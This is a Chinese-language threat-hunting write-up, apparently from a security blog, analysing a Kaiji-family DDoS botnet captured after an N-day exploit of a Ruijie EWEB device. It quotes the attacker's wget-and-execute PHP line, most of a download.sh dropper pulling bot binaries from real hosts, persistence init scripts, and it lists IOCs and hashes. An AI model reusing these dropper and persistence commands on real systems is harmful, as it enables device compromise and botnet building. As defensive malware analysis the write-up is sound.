关键字:Linux/go/Kaiji/20220615
在做威胁狩猎的时候部署蜜罐已经很难捕捉到高端攻击了,可以尝试下部署真实设备及网络环境进行监测,做一个真实的狩猎场。
2022年6月15日在一台“锐捷网络-EWEB网管系统”的设备上捕获到了一个Nday的利用(/guest_auth/guestIsUp.php接口命令执行)。漏洞被利用后自动化进行脚本写入、脚本下载、下载僵尸程序、持久化等一系列操作。
1、捕获操作如下
1.1、脚本写入操作
利用上述漏洞在tmphtmlddiservertest644下写入test644.php文件
exec('wget http://209.141.60.137:4679/llii;chmod 777 llii;./llii');同时还会在tmphtmlddiserver目录下创建test644_tmp目录,具体做了什么已经查不到了,怀疑是下载临时文件并运行。
1.2、脚本下载
下载download.sh保存在/tmp/目录下
#!/bin/shaddress="103.254.72.193:808"os=`uname -s`arch=`uname -m`if [ $os = "Linux" ]; thencase $arch in"i"*"86")wget -t 1 http://$address/linux_386||curl -O --connect-timeout 10 http://$address/linux_386;chmod +x linux_386;./linux_386||rm -f linux_386;;"x86_64")wget -t 1 http://$address/linux_amd64||curl -O --connect-timeout 10 http://$address/linux_amd64;chmod +x linux_amd64;./linux_amd64||rm -f linux_amd64;;"amd64")wget -t 1 http://$address/linux_amd64||curl -O --connect-timeout 10 http://$address/linux_amd64;chmod +x linux_amd64;./linux_amd64||rm -f linux_amd64;;"mips")wget -t 1 http://$address/linux_mips||curl -O --connect-timeout 10 http://$address/linux_mips;chmod +x linux_mips;./linux_mips||rm -f linux_mipswget -t 1 http://$address/linux_mipsel||curl -O --connect-timeout 10 http://$address/linux_mipsel;chmod +x linux_mipsel;./linux_mipsel||rm -f linux_mipselwget -t 1 http://$address/linux_mips_softfloat||curl -O --connect-timeout 10 http://$address/linux_mips_softfloat;chmod +x linux_mips_softfloat;./linux_mips_softfloat||rm -f linux_mips_softfloatwget -t 1 http://$address/linux_mipsel_softfloat||curl -O --connect-timeout 10 http://$address/linux_mipsel_softfloat;chmod +x linux_mipsel_softfloat;./linux_mipsel_softfloat||rm -f linux_mipsel_softfloat;;"mips64")wget -t 1 http://$address/linux_mips64||curl -O --connect-timeout 10 http://$address/linux_mips64;chmod +x linux_mips64;./linux_mips64||rm -f linux_mips64wget -t 1 http://$address/linux_mips64el||curl -O --connect-timeout 10 http://$address/linux_mips64el;chmod +x linux_mips64el;./linux_mips64el||rm -f linux_mips64elwget -t 1 http://$address/linux_mips64_softfloat||curl -O --connect-timeout 10 http://$address/linux_mips64_softfloat;chmod +x linux_mips64_softfloat;./linux_mips64_softfloat||rm -f linux_mip
1.3、下载僵尸程序
通过上一步运行download.sh后根据操作系统不同架构会下载不同的僵尸程序运行,并删除自身。
1.4、持久化
程序运行后会做一些持久化的工作。
/etc/rc.d/init.d/linux_kill持久化
### BEGIN INIT INFO#chkconfig: 2345 10 90#description:System.img.config# Default-Start: 2 3 4 5# Default-Stop:### END INIT INFO/boot/System.img.configexit 0
写入文件行为:
/boot/System.img.config/etc/32678/etc/id.services.conf/etc/init.d/linux_kill
2、样本获取
2.1、HFS获取样本
通过1.1发现url下载地址http://209.141.60.137:4679/llii,但是目前已经无法下载。但是通过端口扫描发现开放了其他端口。
http://209.141.60.137:6359/发现HFS
可以获取样本liss_a5和liss_a6两个。
2.2、URL获取样本
通过1.2脚本中地址可以获取
三、样本分析
3.1、liss_a6和liss_a5
以liss_a6为例:
3.1.1、基本信息
MD5 d97d73970fb455875ade28aac1bf6fb298cce5ef07f4540a8cf1d1c31e0013fb2f2798e3File type ELFFile size 4.44 MB (4653056 bytes)go语言编写
3.1.2、网络行为
angelcyberspace.xyz20.24.75.127:8087 (TCP)
3.1.3、文件行为
释放并执行文件
/etc/id.services.conf/etc/32678/boot/System.img.config
/etc/32678 为脚本文件
while [ 1 ]; dosleep 60/etc/id.services.confdone
3.2、linux_386
3.2.1、基本信息
MD5 8c91f574e4a6f867036898c647e0e094ff5ba9cc14361d1954b56fe97752a2fcd87e69baFile type ELFFile size 5.01 MB (5251072 bytes)go语言编写
3.2.2、网络行为
tomca1.com103.254.72.193:10099 (TCP)103.254.72.193:808 (TCP)
3.2.3、文件行为
写入并执行文件
/etc/id.services.conf/etc/32678/boot/System.img.config
3.3、家族分析
目测两个样本为同一家族,但网络通信地址不同,是不是使用同一僵尸程序的两个团伙还不确定。
通过逆向分析样本发现程序函数名混用英文和拼音,如main_rundingshi、main_runganran、main_runshouhu、main_runkaiji。
4、IOC总结
4.1、网络监测
209.141.60.137angelcyberspace.xyz20.24.75.127tomca1.com103.254.72.193
4.2、文件检测
/tmp/html/ddi/server/test644/test644.php/tmp/html/ddi/server/test644_tmp//tmp/download.sh/etc/rc.d/init.d/linux_kill/boot/System.img.config/etc/32678/etc/id.services.conf/etc/init.d/linux_kill
原文始发于微信公众号(也许安全):通过一个Nday发现的DDOS家族
